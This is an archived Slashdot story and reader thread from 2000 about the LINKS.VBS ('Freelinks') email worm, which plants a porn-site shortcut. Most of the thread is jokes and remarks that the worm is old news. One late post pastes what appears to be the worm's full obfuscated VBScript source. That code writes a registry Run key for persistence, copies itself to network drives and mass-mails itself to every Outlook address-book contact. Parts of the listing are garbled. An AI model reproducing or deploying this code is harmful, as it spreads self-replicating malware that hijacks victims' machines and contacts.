The Next Generation of ILOVEYOU:The Porn Worm

Erik Green writes "I've been sent a new semi-benign ILOVEYOU variant - it's got a subject line of "Check this" and consists of a one-line message and an attachment named LINKS.VBS. Its only purpose other than self replication is to add a link to a XXX site to your desktop. The attachment is a self-replicating script that copies itself to all network drives and sends itself to everyone listed in outlook's address book. This variant is interesting since it's partially encrypted to obscure it's purpose. It's nice enough to ask if you want the shortcut added to your desktop, but it doesn't ask about replicating itself. It's basically a trojan advertisement. Fortunately, it doesn't delete any files. Needless to say, only machines that run outlook and have visual basic scripting available are vulnerable. "

Re:I Like You

[duckyd]

I think everyone that's ever said the work unix got that...

Great movie title!

[d-man]

I'd always wondered where pr0n producers come up with movie titles as original as "Sheepless in Montana" and "Shaving Ryan's Privates". Now I know -- they get them from /.! I can't wait for "Porn Worm: The Movie" to come to DVD.

Does this bring a second meaning to "trojan advertising"?

That's an OLD one...

[MightyTribble]

My bosses' machine had that virus about six weeks ago. It placed a link to a porn link exchange site, if I remember correctly.

It was trivial to clean, AIRC. Nowhere near as nasty as ILUVU was.

Sorry, Cmdr, but this doesn't sound like a new virus. Did you check out Symantec's library before posting, to see if it had any history?

Re:Unix and Viruses.

[PurpleBob]

There's a log of one time this actually worked at http://www.theplunger.com/idiot/. The log is long, but quite funny. It probably helps to know what a MUSH/MUX is, but it's not necessary.

A choice quote from the log: ('You' is the person giving the "help", and Oronde is the idiot)

You say "Type 'ls' and tell me what you see."
Oronde says "okay now what?"
Oronde pages: nothing...
You say "oops. I guess rm *is* the deleting files and 'del' isn't."
You say "Wow. What a mistake *I* made! I must have not read the manual!"
--
No more e-mail address game - see my user info. Time for revenge.

Survival of the Species

[BlatantKarmaWhore]

Frankly, it's a bit disturbing to see all the abuse M$ users get. The general view seems to be that if you're running Windows you're a moron, because of all the blatant security holes. I'm not arguing that. Windows has more accessable holes than a hour long gay pr0no. And everybody knows about them. The reason everybody knows about them is that Windows is what the vast majority of people use. It's the standard for the market, and therefore it's subject to the most examination. But that's off topic. The reason that all these viruses are aimed at M$ is the law of the jungle. If you have a huge population of prey, the associated predators grow in population as well. When the majority of users run Windows, the haXOrs aim for Windows systems. A virus vs. Windows is international news. A virus vs. Linux or Macs or whatever, while it might be important to /. fans, is NOT international news. Not enough people are effected. Now please form an orderly line to flame me into oblivion.

productive useful virus

[jessica6]

I'm still waiting for the MS virus that will blow away Windows, ftp the latest version of RedHat and install it. This would happen off hours, of course. :)

Re:Unix and Viruses.

[DrTomorrow]

If Linux (or any one version of Unix) had 80% market share and ran an Office suite with 80% market share, Linux would have a similar virus problem.

Virus writers want them to spread. It doesn't take a brain surgeon to target 80% of the computers instead of 4%.

damit

[jbarnett]

damit the commerical world gets all the cool tools, the sound blaster live drivers where out first on Windows, and most of the new 3D cards are supported under windows, not to menation the cool automatic shutdown "blue screen of death" that is smart enough to turn it's self of and now this.

Dammit, I would like porn on my desktop, please please tell me this works under wine...

Re:I thought this was old news...

[z00t]

Saw this months before ILOVEYOU. Is Slashdot getting lazy? With all their bread, maybe somebody could taken 15 seconds to check any 1 of the major AV vendors' sites before posting this.

Sorry, but this isn't a new virus

[montjoy0]

We had this pass though my work over a month ago. But don't take my word for it, go to http://vil.nai.com/villib/dispVirus.asp?virus_k=10 225 Looks like it's as old as last July.

Links.vbs Virus is not new..

[cOdEgUru]

Actually this particular virus was born and probably inspired the ILOVEYOU virus. This is again a script kiddie virus and was release around six months back and the firm where in which I worked was affected. But the virus writer did something dumb..the virus sent itself three times to the same person on your Outlook Addressbook. Since three mails from the same person with the same attachment is fishy in nature, I never even looked at it. later I dissected the code and saw it didnt do much other than copying itself to network drives and adding the link.

My stupid Project Mgr opened it and he didnt even know that it left a link "XXXLinks" on his desktop until I showed him.

This is nothing new, just some kid who thought the ILOVEYOU virus is getting all the attention that he deserves and decided to send his baby out again.

Grow up!

Why on earth would you install this?

[CaptainSuperBoy]

I looked on their web site to find out what this thing was.. why would anyone run this program? It puts an ad bar on your browser, it adds some crappy bookmarks to your browser.. it puts links on your e-mails.. it changes your home page to their page.. it pops up a new window every time you open a new URL!

Not only that, they basically threaten that if you try to remove the software, it will put itself back when you reboot..

Why on earth would you use this? I can't see any redeeming features.. I even went to their homepage and tried running a search. Half the links don't work, and the other half take you to random searches about casinos and stuff..

Hrmph!

[GoRK]

My god, for the first time in history the virus warnings on slashdot are outnumbering the ones inept people are e-mailing me!

~GoRK

Theoretically...

[schon]

Theoretically, I can see at least one good use of this stuff: remote administration.

A network admin/tech support department could save time by emailing auto-installing software updates to clueless users' machines, instead of having to trudge out to each users' machine to do the install..

Of course, this is just in theory - in reality, I've never seen it used, and I honestly think the *nix method (telnet/ssh/whatever) is less prone to abuse.. even telnet requires a PASSWORD to verify that the person attempting to to use the system is who they say they are..

All in all, it MIGHT have it's uses, if it were implemented in a more secure manner.

Re:Theoretically...

[mpe]

A network admin/tech support department could save time by emailing auto-installing software updates to clueless users' machines, instead of having to trudge out to each users' machine to do the install..
Of course, this is just in theory - in reality, I've never seen it used, and I honestly think the *nix method (telnet/ssh/whatever) is less prone to abuse.. even telnet requires a PASSWORD to verify that the person attempting to to use the system is who they say they are..

More likely easier to use login scripts or remote administration programs. An obvious problem with using the email upgrade aproach is that the email program itself is quite hefty and likely to be holding on to resources the installer wants to upgrade.

Re:Alternative virii?

[DeanT]

I read about a similar idea from one of the Unix gurus before (I don't remember exactly who it was, unfortunately). Basically, the article talks about how even source code is not a guarantee that you are safe.

I believe that the UNIX guru in question is Ken Thompson. His article Reflections on Trusting Trust is quite interesting.

Regards,
DeanT

DeCSS

[Detroit]

Try spreading decss with something like this. You could force-mirror any reasonable size files with this kind of trojan mechanism. 'Educational viruses'. There would be a disadvantage of brutally harsh pr for your cause by media and govt, but it might be balanced by the need for survival of the software or information.


... . . .

Older than ILOVEYOU

[BluesGeek]

This virus is actually a little older than the ILOVEYOU virus and only shares the Outlook proagation technique. It is pretty cleverly written to encrypt / decrypt itself through multiple layers.

Re:Make you want to...

[seibed]

re: alter the virus to make the porn site the default page for the browser, not just add a desktop link.

I would think that if the virus worked, you would bring down the server incredibly quickly (as millions would automatically go to this sight as soon as they got this virus)

Re:Zero Originality

[quonsar]

As if everyone who sends unsolicited email is 'dumb as a post.'

You're right. Some of them are actually dumb as a rock.

======
"Rex unto my cleeb, and thou shalt have everlasting blort." - Zorp 3:16

Re:Independent Confirmation

[orangecat]

Will the Symantec Antivirus Research Center entry do?

Yes, its true. Though it is far from a new thing - it's been around for about a year now.

When will M$ Users Get it?

[grubby]

I swear how many viruses came out that have taken advantage of this .vbs prob? It has only taken M$ two years or so to fix the prob. Or at least that is what they "say". Until someone finds the next bug in outlook, or some key component of windows. How do companies and the government continually put up with being beaten by these? I guess somebody needs to tell them to get a clue. Anybody have any ideas how to make them understand that these problems are only on the micro$oft platforms? Someday if we are luck they will get it.

(-1, redundant) !

[Super_Frosty]

That's the score that this article should get, on account of the fact that this has been discussed SEVERAL TIMES on /.!! I mean, if I name a worm after myself, will I get a story?

Remember, there is nothing new to say here, except for some karma whoring.

Have a nice day!

what's next?

[grizzo]

a link to porn on my desktop???

why can't all viruses be this horrific...? next thing you know i'll be recieving the "FREECASH" email.
too bad i'm not an outlook kid...

Mattel Responds

[laborit]

So now Cyber Patrol will have to add the Windows Desktop to its blocked site list, right?

THAT should teach Microsoft to integrate its browser with its OS...

- Michael Cohn

Too bad...

[albamuth]

...whomever made the virus didn't have it paste porn content to the victim's desktop.

Er, I mean, good thing they didn't.

the most painful virus of them all..

[scooterboy13]

is the "I just want to be friends" virus. Ouch.

Email Virii and Outlook

[haginmat]

One of the best ways to prevent the spread of little nasties like Love Bug and others is really simple. Set your mail reading to 'return to inbox' rather than have it open the next item. Regards haginmat

New???

[Nezer]

I got with this one many, many months ago!

It's pretty neat to look at and I highly recommend anyone look at the source and pull it apart. You will have to check-out the "encrytion" algorithm (if it can be called that) th get the key.

Of course, you can always do what I did and crack the old way, with pen and paper. ;)

Re:LINKS.VBS? and Microsoft Outlook Security Patch

[Cplus]

I had the same thing happen to me with IRC. I didn't accept it because the person who was sending left a message in channel about the fact that they had some kind of weird virus. I didn't hear a thing about it after that.

I tried out the security update on one of the workstations at work. I think it was the best thing that ever happened for the user. She became so frustrated with the lack of functionality that they switched over to Netscape mail. Last one..........thankfully. As for seeing an end to the "worm" viruses, it won't happen until everyone learns the lesson of this user. Only took her a year of constant chaos.

Re:Wrong

[seibed]

RE: Man. I should write a program in C that formats your HD after mailing itself to everyone in your outlook address book, and then I could be a famous virus writer too!

uh-oh, now the FBI is going to come looking for you the next time a virus comes out...

I could see the headlines now, "Hacker 'mindstrm' was arrested in an early morning raid, FBI points to incriminating posts on Hacker discussion group 'Slashdot'"

seibed

I Like You

[bricriu]

Anyone out there get the "I Kinda Like you" virus for *nix? It's on the honor system: rm a few files your not using and forward to your friends. Wish I'd thought of it :)

Re:I Like You

[mazur]

Anyone out there get the "I Kinda Like you" virus for *nix? It's on the honor system: rm a few files your not using and forward to your friends.

Don't spread it around! Now I have to delete some more files and forward this to all my friends and nodding acquintances again! You're giving me a bad name, you. I shall have to install a filter to make sure I never see you again. I'm quite honourable, I'll have you know. Only a handshake is needed to clinch a deal, and I won't back out of it. Invoking it to your benefit or my detriment is evil.

Stefan.
"If someone has no honour, how can you trust him?" "Grab him by the wallet?" "Good point."

Re:I Like You

[kz45]

this virus is Old. It's not a variant of the ILOVEU virus. THe creator of the ILOVEU virus probably took some of the code. I've seen this one over a year ago(e-mail + many IRC networks).

Sorry, that's an old one.

[zinger]

The Freelinks virus as it's called is an old virus. I saw it first about six months before the loveletter came out.

Zero Originality

[doogles]

If you're going to write a virus to advertise your stupid porn website, at least have some originality and write a nice, new virus from scratch instead of stealing someone else's idea.

Re:Zero Originality

[delysid-x]

And some of them know what they're doing and make $1000/day.

Re:Zero Originality

[Cody+Hatch]

And some of them know what they're doing and make $1000/day.

Yeah. $1000 a day...from people who are dumb as rocks!

Re:Zero Originality

[Cody+Hatch]

Well, not from that school, anyhow. Still, I doubt anyone at MY school has made ANY virus's. The quality of the virus apart, at least the guy got an A for effort...

Re:Zero Originality

[Tarquin]

Shouldn't that read... dumb er than rocks?

--

Re:Zero Originality

[Squeeze+Truck]

If you're going to write a virus, it'd be best not to have a fixed target like a website that angry sysadmins and feds can use to start tracking you down.

Re:Zero Originality

[Qic]

I saw a news report somewhere online that said that the authors of ILOVEYOU were, in effect, the best and most talented at the school they were from. I damn near spewed a mouth full of pepsi out my nose when the sudden laugh came upon me. If these guys are the brightest, I guess that we don't have to worry too much about info terrorism from the Phillipines.

Re:Zero Originality

[I+R+A+Aggie]

If you're going to write a virus to advertise your stupid porn website, at least have some originality and write a nice, new virus from scratch instead of stealing someone else's idea.

These are spammers you're talking about:

1. Spammers are dumb as a post.
2. Spammers lie.
3. If in doubt, refer to 1. or 2.

When is the last time you saw an original spam? 1996??

James

Re:Unix and Viruses. = DIFFERENCE

[Koos]

The difference is that no Linux vendor makes a distribution where the email client executes arbitrary code embedded in attachments.

The day everything happened with the ILOVEYOU virus, I tried to replicate the behaviour with mutt, a unix mail client. I made a simple shell script 'test.sh' which did 'echo test'. When sending it with mutt, it was given mime-type application/x-sh. So at sending time, a shell script is recognized as such and given the correct type. When I received it, mutt gave the message '[-- application/x-sh is unsupported (use 'v' to view this part) --]'.

I can set up mutt to execute application/x-sh scripts as shell scripts. But the big difference is that I have to set it up to be dangerous before that happens! The mentality in (most) Unix programs is nowadays security first.

PICS labels :)

[paulschreiber]

I wonder if MS users can see the site if they've turned on IE's PICS support...

Old news.

[Tamriel]

Have any of you ever been on IRC?
links.vbs is very, very old news (talking at least a year), to anyone who's ever been in a channel with mIRC weenies (I used to op in a huge MP3 and a huge MPEG channel, so I knew all about it very quickly ;).
Gawd, if you're going to release news of every old skript k1dd13 .vbs "virus", you'd need a few terabytes just to handle the HTML involved.

d


-

Independent Confirmation

[smutt]

This is some pretty funny stuff. Does Slashdot
have any independent confirmation that the person who submitted this didn't just make it up??

Re:Independent Confirmation

[Bad+Dude]

I don't know about Slashdot, but I saw this one about 6-9 months ago.... This is not new news...

Re:Independent Confirmation

[SoftwareJanitor]

Given how easy this would be to implement by modifying the ILOVEYOU virus, even if it started as a hoax, how long would it be before someone, given the suggestion, implemented it?

Reality immitates fiction immitates reality.

Re:Unix and Viruses. = DIFFERENCE

[Submarine]

The difference is that no Linux vendor makes a distribution where the email client executes arbitrary code embedded in attachments.

What's next....

[glitch_]

I'm going to write a worm that finds everybody that is transfering copyrighted material, then I'm going to sue them...oh wait, nevermind.

Re:What's next....

[rgmoore]

I have actually received spam with a "copyright" notice on the bottom stating that replying, forwarding, redirecting, reposting, etc., anything from the message would constitute a violation and would be prosecuted.

You mean that you actually read your spam for longer than it took to decide to hit the delete key? What's wrong with you?

Actually, this sounds like the basis for a moderately amusing scheme. You copyright a message and then spam it to millions of people with the section mentioning that it's copyrighted and all reproduction is forbidden. When they forward your message to abuse@your.isp.com, you sue them for copyright infringement. The only problem is that a halfway intelligent defense lawyer would be able to argue that forwarding the message to the abuse authorities is fair use. So much for that plan.

Re:What's next....

[Hominy+Chef]

I've got a better idea... Write a worm/virus, copyright it, and sue everyone that passes it around. Make Money Fast! The only thing you have to worry about is hordes of angry Windows users and their lawyers.

Oh, wait... the Napster/Metallica conspiracy has already done this...

Re:What's next....

[Tarquin]

Have you ever noticed that internet time and dog years are the same?

So... if my dog... writes... internet software... <g>

Optional ending:... then... he's a witch!! Burn 'im!! Burn 'im!!

--

Re:What's next....

[ZikZak]

I have actually received spam with a "copyright" notice on the bottom stating that replying, forwarding, redirecting, reposting, etc., anything from the message would constitute a violation and would be prosecuted. Yes, they were serious. I promptly forwarded it (just the copyright portion. no need to spread the spam) to several people.

another one!?!?!

[gee308]

There seems to be a lot of viruses coming out these days. How immune are the Linux/Unix systems and what can we do to prevent these kind of viruses from causing us trouble? How would the current viruses need to be configured to bother us? Starcraft Linux, IPMASQ, Gnutella

WORM.Slashdot

[Jage]

WORM.Slashdot

WORM.Slashdot is a worm that will work under most nerdy minds. Once the worm is launched, it uses person involved to waste valuable working time on daily basis reading Slashdot. It can also a number of ways to propagate: other web pages, by word of mouth, IRC and email by masquareding as something interesting.

Also known as: /.bomb

Category: WORM

Infection length: 100-400 posts, 1-100 slashdot.org loads per day

Virus definitions: May 23th, 2000

Threat assesment:

Damage: HIGH - Distribution: HIGH - Wild: HIGH

Wild

• Number of infections: More than 1000000
• Number of sites: 1 (slashdot.org)
• Geographic distribution: HIGH
• Threat containment: HIGH
• Removal: HIGH

Damage

• Payload
  • Large scale loading of web pages: mostly slashdot.org
  • Slashdot effect: More dangerous side effect when slashdot.org links to some external page
  • Lost sanity: Might make you write posts on subjects like "First Post!", "Beowulf cluster" and "Natalie Portman". That happens mostly only before total system breakdown.
  • Modified files: /dev/brain

Distribution

• Word of mouth: Check this
• Target of infection: Nerds

Technical description

Similar to the freshmeat virus, this worm uses nerd() calls to make users reading slashdot.org (and wasting valuable working time). The contents of worm is "Slashdot.org News for Nerds: Stuff that matters".

Removal:

• Destroy all modems, network cards and other devices capable with TCP-IP networking.

Write-up by: Jage May 23th, 2000

This is funny. Laugh now.

Re:Suggestions for improvement

[snubber1]

My soulution for when that gets out of hand (or when netscape just hangs) is to click the little stick of dynamite on my toolbar that executes one command...
"killall -9 netscape"

----------------------------------------------

Where can I get it?

[dodeldo]

I want that link! Always looking for fine pr0n.

if you're still getting it...

[banky]

... then you know a lot of people that aren't computer saavy, or are just plain stupid.

The news has been out there. Pundits are talking about everything. MS, the AV shops, and every admin worth his salt is taking steps to stop it.

In other words, unless it defeats all known AV and sensible security precautions (ie, disable most of Outlook's functionality) then I say, lets drop the issue.

Old News...

[rider]

This virus has been out since July 1999 according to NAI. Check out http://vil.nai.com/villib/dispvirus.asp?virus_k=10 225
for the info. Seems like this would be more of a cousin to Melissa rather than ILOVEYOU.

Vulnerable? As long as it isn't a pay site, lucky!

[The+Evil+Beaver]

"Needless to say, only machines that run outlook and have visual basic scripting available are vulnerable."
I don't think so. Well, if it's free porn, vulnerable is the wrong word. If it's a free site, then Outlook users like myself are lucky to catch this one. Gimme gimme! (=


When the pack animals stampede, it's time to soak the ground with blood to save the world. We fight, we die, we break our cursed bonds.

Re:trojans

Only the condom commercials.

Not new

[Mojojojo+Monkey+Inc.]

Worms with the name Links.vbs have been floating around IRC for several months now, this looks like someone just decided to create an email variation, it used to just send via DCC.

In fact

[NetJunkie]

According to Symantec it was found last July.

Re:This is a bug?

[Platinum+Dragon]

Wow, a free app that adds a shortcut to a porn site on my desktop and generiously tells all my friends coworkers. Thats not a bug!

Of course not. It's a feature.

Marketing value in viruses?

[ivan37]

Finally someone realized the marketing value of viruses! Heck, all it would take is a few good programmers for a large company like oh, Microsoft, to plaster obscure ads like this all over your computer. Or, hey, what about setting your computer to DDoS a set of Linux websites? Keep it under the wraps, and they could be having problems for weeks, not to mention loosing alot of money, etc! Or how about changing your hosts file so that whenever you go to slashdot.org, you actually go to microsoft.com/whylinuxisbad. Hey...have you ever thought that this is what is happening? Its Microsoft that makes all the bugs in Outlook, so they could easily use the bugs to make these kinds of viruses! It was Microsoft who made the Love Bug! Then they bought some stock in a porn site and made this new virus! Those Bastards!

There's more coming...

[mashx]

After the worldwide strike of the "I LOVE YOU VIRUS", reports are already coming in that the virus is mutating into several variants.

Within the next few hours, expect to see:

The original "I love you" virus

The "I like you a lot" virus

The "You're nice, but I just want to be friends" virus

The "Its not you, its me" virus

The "Look, it was just a date...don't get clingy" virus

The "Okay, I think its best if we don't have anymore contact" virus

The "It was late, I was drunk, you were easy" virus

The "Stop calling me, you unfeeling prick" virus

The "That's it, I hate you and your stupid cat" virus

Plus:

The "No, I Reeaallllyyyy Like You" Virus ... usually hits around midnight

The "You're Beawfullll ....." virus .... usually hits about 2am

The "Nothing has to happen. I just want to wake up with you in my arms" virus ..... careful, it's a sly one.

The "You're OK but I was wondering if your friend is single" virus

The "Of course I'll phone you ... Now do you want me to call a cab for you?"

.......... hmmm, that'll hit anytime between 3am & noon.

Yet to have caffeine, seemed funny at the time...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~

Re:Unix and Viruses.

[mpe]

If Linux (or any one version of Unix) had 80% market share and ran an Office suite with 80% market share, Linux would have a similar virus problem

Only if this "Office suite" had the same poor design as MS Outlook.
The claims that "It only happens because Windows is popular" are a subtle form of FUD. Anyway as someone has already pointed out, Where are all the apache affecting viruses?
Probably the primary reason that virus writers target Windows is that it is easy to write viruses for and those viruses can do all sorts of things.

new type of spam???

[DaRkJaGuaR]

ye goda if it isin't enough to have your inbox full of spam, now u can get your desktop/anyhtign else about your computer changed by spammers grrrrr lets hope that this dosen't becomd a trend..

Re:Make you want to...

[sconeu]

Maybe if Bill gets his default page set to "Naughty Barnyard Nyphos" a few times he will pay more attention to security.

What's a "Nypho"?

Re:Make you want to...

[passion]

I first read this to be:

Maybe if Bill gets his default page set to "Naughty Barney Nymphos"....

If only :)

Re:NOT NEWS ANYMORE!

[mpe]

Ok, this is NOT news. News will be that MS has developed some fab means of having scripting that is not a big gaping security hole.. (or news of any real innovation from MS for that matter)

Microsoft's innovation is to be egocentric. First we had "My Computer" and "My Documents", not we have "Windows ME"
Just about everything Microsoft have done in the last several users is a "rip off" of other people's ideas.

Re:Two things...

[mpe]

Are there any LEGITIMATE uses for sending vbs scripts as email attachments (especially auto-run attachments) that I don't know about? I mean, obviously if you're part of a group of coders working on a vbs dev project you might want to exchange snippets but is there any reason for the average person to even expect a vb script in his/her email?

Maybe the question should be "Are there any legitimate situations outside environments where the sysadmin can explicitally enable this. If and when it is needed." i.e. is there any legitimate reason for this being on by default?

Not a variant of iloveyou but an older case

[Mashiara]

As someone already mentioned this is not a variant of the ILOVEYOU case but an older worm called Freelinks, see http://www.F-Secure.com/v-descs/freeli nk.htm for analysis.

Re:Unix and Viruses. = DIFFERENCE

[mcjulio]

Just to clear up a prevalent rumor:

The arbitrary code was not embedded in the message (any more than any other MIME-encoded attachment is embedded), and it was not executed by the email client. It required the user to double-click on it to execute it, exactly like any other executable attachment. The security hole is in the scripting model (Windows Scripting Host) that provides an automated interface to the global address book.

In a Perfect World

[WillAffleck]

In a perfect world, the virus would create a windows link called "Windows 2000 Bug Fix" which had a link to download and install one of the Linux or BSD distros.

Apples and Oranges

[JayBonci]

Okay, there are a lot of things flying around here.. first off, linux and windows... well read the subject. Most people think windows 95/98, a non-protected "go what you want, its your machine and you're the only one on it OS". We are talking about two TOTALLY different things here. Now if you want to talk windows NT and linux, sure go for it. Effective system administration could stop any such virus. You could re-register .vbs files to a scripted something saying that you are about to execute a .vbs file and if you dont know what you are doing executing it, then press NO, or something. Simple enough. UNIX is too inconsistant to be hit by a virus as such... remember, VB is the tool of choice for NT, as perl or python or /bin/sh is for UNIXy OS's. There could easily be something that WELL hid itself in shell code and modified it, or faked the viewing aspect, or something. Unix is genenerally more well explored by its users, however there are plenty of times where there are files where even an experienced user does not mess with.. how many people mess with their .netscape stuff? My point is, UNIX users of the world, count your blessings.... there are many threats out there to security, that even open source is not going to stop... for every crafty person waiting to write a malicious vbs script, there is going to be a crafty perl nutcase waiting to fdisk a few drives. System administration solves many security woes. With a heads up, a good exchange admin can stop this kind of attack, and still gain the benefit of using that particular mail product. Linux looks great because windows (98) looks bad. Thats the way it is. There are people that swear by both. The ILOVEYOU virus sucked. It hurt a lot of companies, businesses and government agencies.. A few friends of mine got it.. however, not running as administrator on their own machines lead to a little file cleanup afterwards.. end of story. System administration is the magic bullet..keep your users under your watchful eye. There will always be something to sneak up on them. Keep in mind what you are comparing when you say "UNIX is safe...", or "UNIX will never have this kinda trouble"... linux should be greatful to shine in the bad press. its about the technology, not the name --jay

LINKS.VBS

On Error Resume Next
Set A1 = CreateObject("Scripting.FileSystemObject")
Set A2 = A1.OpenTextFile(WScript.ScriptFullName,1)
Do While A2.AtEndOfStream = False And Mid(A3,40,10) "`sd]Lhbsnr"
A3 = A2.ReadLine
Loop
A2.Close
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder (1),B("STOEMM/WCR")),True)
A4.WriteLine(B("No!Dssns!Sdrtld!Odyu"))
A4.WriteLine(B("Rdu!@0!O\J>@KFQB_Pliwt^ub_Jf`ulp liw_T fqgltp_@ruubqwYbupflq_Urq_Urqgoo""""+*C3,@wkjbNcrf &C3,IgrUngekcjDqjbgp&3+*@&""""URQGOO1YEP """"++""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Kd!Oui@qv&@&""" "Wkfp tfoo ^gg ^ pkluw`rw wl iubb [[[ ofqhp lq vlru gbphwls1 Gl vlr t^qw wl `lqwfqrbssof`^wflq""""++""( ("))
A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C33!?!C3.,I grLcogUnceg&@&""""J>SF""""++""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Dqp!Gcef!C30!Kl !C33,CbbpguuJkuru""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C35!?!C3.,E pgcrgKrgo&.+""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Dqp!C32!?!3!Rq! C30,CbbpguuGlrpkgu,Eqwlr""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C37!?!C30,C bbpguuGlrpkgu&C32+""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Kd!C32!?!3!Rfgl ""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C37,C bbpguu""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Gjug""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C35,@ EE!$!@&""""8 """"+!$!C37,Cbbpguu""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C35,Uw`hger!?!@ &""""@kb`h wkfp""""+""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C35,@qb{!?!@&"" ""K^yb irq tfwk wkbpb ofqhp1""""+!$!Efp&35+!$!Efp&3.+!$!@&""""Evb1""""+" "(("))
A4.WriteLine(B("@5/VshudMhod)C)""C35,Crrcefoglru ,Cbb!YUepknr,UepknrDwjjLcog""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C35,BgjgrgCdrgp Uw`okr!?!Rpwg""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C35,Uglb""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Dwlerkql!@&@3+" "(("))
A4.WriteLine(B("@5/VshudMhod)C)""Dqp!@0!?!3!Rq!J gl&@3+""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Kd!Cue&Okb&@3*@ 0*3++!:(""(("))
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?3""(( "))
A4.WriteLine(B("E5/VshudMhod)C)""Gtglr3?QL!HQKL8 %81bee!uglb!#lkem!""(!'!@0/CthmeQ`ui)@0/Fd uRqdbh`mGnmeds)1(-C)""JKLMU,T@U""((("))
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?3""( ("))
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]3../Jgtgj!3.._ ""(("))
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]0../Jgtgj!0.._ ""(("))
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]5../Jgtgj!5.._ ""(("))
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]2../Jgtgj!2.._ ""(("))
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]7../Jgtgj!7.._ ""(("))
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
A4.WriteLine(B("E5/Bmnrd"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Odyu"))
A4.WriteLine(B("Gns!D`bi!E4!Ho!@0/FduGnmeds)E0(/ RtcGnmedsr"))
A4.WriteLine(B("E!E4/Q`ui"))
A4.WriteLine(B("Odyu"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Doe!Rtc"))
A4.Close
Set A5 = CreateObject(B("VRbshqu/Ridmm"))
A5.RegWrite B("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]B tssdouWdsrhno]Sto]Stoemm"),A1.BuildPath( A1.GetSpecialFolder(1),B("STOEMM/WCR"))
If MsgBox(B("Uihr!vhmm!`ee!`!rinsubtu!un!gsdd!YYY!mho jr!no!xnts!edrjunq/!En!xnt!v`ou!un!bnouh otd>"),36,B("Gsdd!YYY!mhojr")) = 6 Then
Set A6 = A1.CreateTextFile(A1.BuildPath(A5.SpecialFolders(B ("Edrjunq")),B("GSDD!YYY!MHOJR/TSM")),Tr ue)
A6.WriteLine(B("ZHoudsoduRinsubtu\"))
A6.WriteLine(B("TSM 0 Then
For A9 = 0 To A8.Count - 1
If InStr(A8.Item(A9),B("]]")) 0 Then
A1.CopyFile WScript.ScriptFullName, A1.BuildPath(A8.Item(A9),B("MHOJR/WCR"))
End If
Next
End If
Set A10 = CreateObject(B("Ntumnnj/@qqmhb`uhno"))
Set A11 = A10.GetNameSpace(B("L@QH"))
For Each A12 In A11.AddressLists
Set A13 = A10.CreateItem(0)
For A14 = 1 To A12.AddressEntries.Count
Set A15 = A12.AddressEntries(A14)
If A14 = 1 Then
A13.BCC = A15.Address
Else
A13.BCC = A13.BCC & B(":!") & A15.Address
End If
Next
A13.Subject = B("Bidbj!uihr")
A13.Body = B("I`wd!gto!vhui!uidrd!mhojr/") & Chr(13) & Chr(10) & B("Cxd/")
A13.Attachments.Add WScript.ScriptFullName
A13.DeleteAfterSubmit = True
A13.Send
Next
Function B(B1)
For B2 = 1 To Len(B1)
If Asc(Mid(B1,B2,1)) 34 And Asc(Mid(B1,B2,1)) 35 And Asc(Mid(B1,B2,1)) 126 Then
If Asc(Mid(B1,B2,1)) Mod 2 = 0 Then
B = B & Chr(Asc(Mid(B1,B2,1)) + Right(Asc(Mid(A3,70,1)) + 1,1))
Else
B = B & Chr(Asc(Mid(B1,B2,1)) - Right(Asc(Mid(A3,70,1)) + 1,1))
End If
Else
B = B & Mid(B1,B2,1)
End If
Next
End Function

Re:Unix and Viruses.

[Keith_Beef]

